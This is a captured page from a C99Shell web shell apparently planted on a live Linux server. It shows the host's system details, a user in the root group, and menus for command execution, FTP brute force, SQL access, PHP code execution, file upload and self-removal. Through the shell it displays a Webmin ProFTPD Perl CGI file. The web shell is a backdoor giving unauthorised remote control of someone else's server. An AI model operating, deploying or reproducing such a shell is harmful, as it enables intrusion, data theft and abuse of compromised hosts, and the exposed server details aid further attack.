!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/proftpd/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     anon_index.cgi (2.09 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# anon_index.cgi
# Display a menu for anonymous section options

require './proftpd-lib.pl';
&ReadParse();
($conf, $v) = &get_virtual_config($in{'virt'});
$anonstr = &find_directive_struct("Anonymous", $conf);
if (!$anonstr) {
    # Go to the anon options page
    &redirect("edit_aserv.cgi?virt=$in{'virt'}&init=1");
    exit;
    }
$anon = $anonstr->{'members'};

# Display header and config icons
$desc = $in{'virt'} eq '' ? $text{'anon_header2'} :
          &text('anon_header1', $v->{'value'});
&ui_print_header($desc, $text{'anon_title'}, "", undef, undef, undef, undef, &restart_button());

print "<h3>$text{'anon_opts'}</h3>\n";
$anon_icon = { "icon" => "images/anon.gif",
           "name" => $text{'anon_anon'},
           "link" => "edit_aserv.cgi?virt=$in{'virt'}" };
&config_icons("anon", "edit_anon.cgi?virt=$in{'virt'}&", $anon_icon);

# Display per-directory/limit options
@dir = ( &find_directive_struct("Directory", $anon) ,
     &find_directive_struct("Limit", $anon) );
if (@dir) {
    print &ui_hr();
    print "<h3>$text{'virt_header'}</h3>\n";
    foreach $d (@dir) {
        if ($d->{'name'} eq 'Limit') {
            push(@links, "limit_index.cgi?virt=$in{'virt'}&".
                     "anon=1&limit=".&indexof($d, @$anon));
            push(@titles, &text('virt_limit', $d->{'value'}));
            push(@icons, "images/limit.gif");
            }
        else {
            push(@links, "dir_index.cgi?virt=$in{'virt'}&".
                     "anon=1&idx=".&indexof($d, @$anon));
            push(@titles, &text('virt_dir', $d->{'value'}));
            push(@icons, "images/dir.gif");
            }
        }
    &icons_table(\@links, \@titles, \@icons, 3);
    }
print "<p>\n";

print &ui_form_start("create_dirlimit.cgi", "post");
print &ui_hidden("virt", $in{'virt'});
print &ui_hidden("anon", 1);
print &ui_table_start($text{'index_dlheader'}, undef, 2);

print &ui_table_row($text{'index_dlmode'},
    &ui_radio_table("mode", 0,
        [ [ 0, $text{'virt_path'},
            &ui_textbox("dir", undef, 50) ],
          [ 1, $text{'virt_cmds'},
            &ui_textbox("cmd", undef, 30) ] ]));

print &ui_table_end();
print &ui_form_end([ [ undef, $text{'create'} ] ]);

&ui_print_footer("virt_index.cgi?virt=$in{'virt'}", $text{'virt_return'},
    "", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--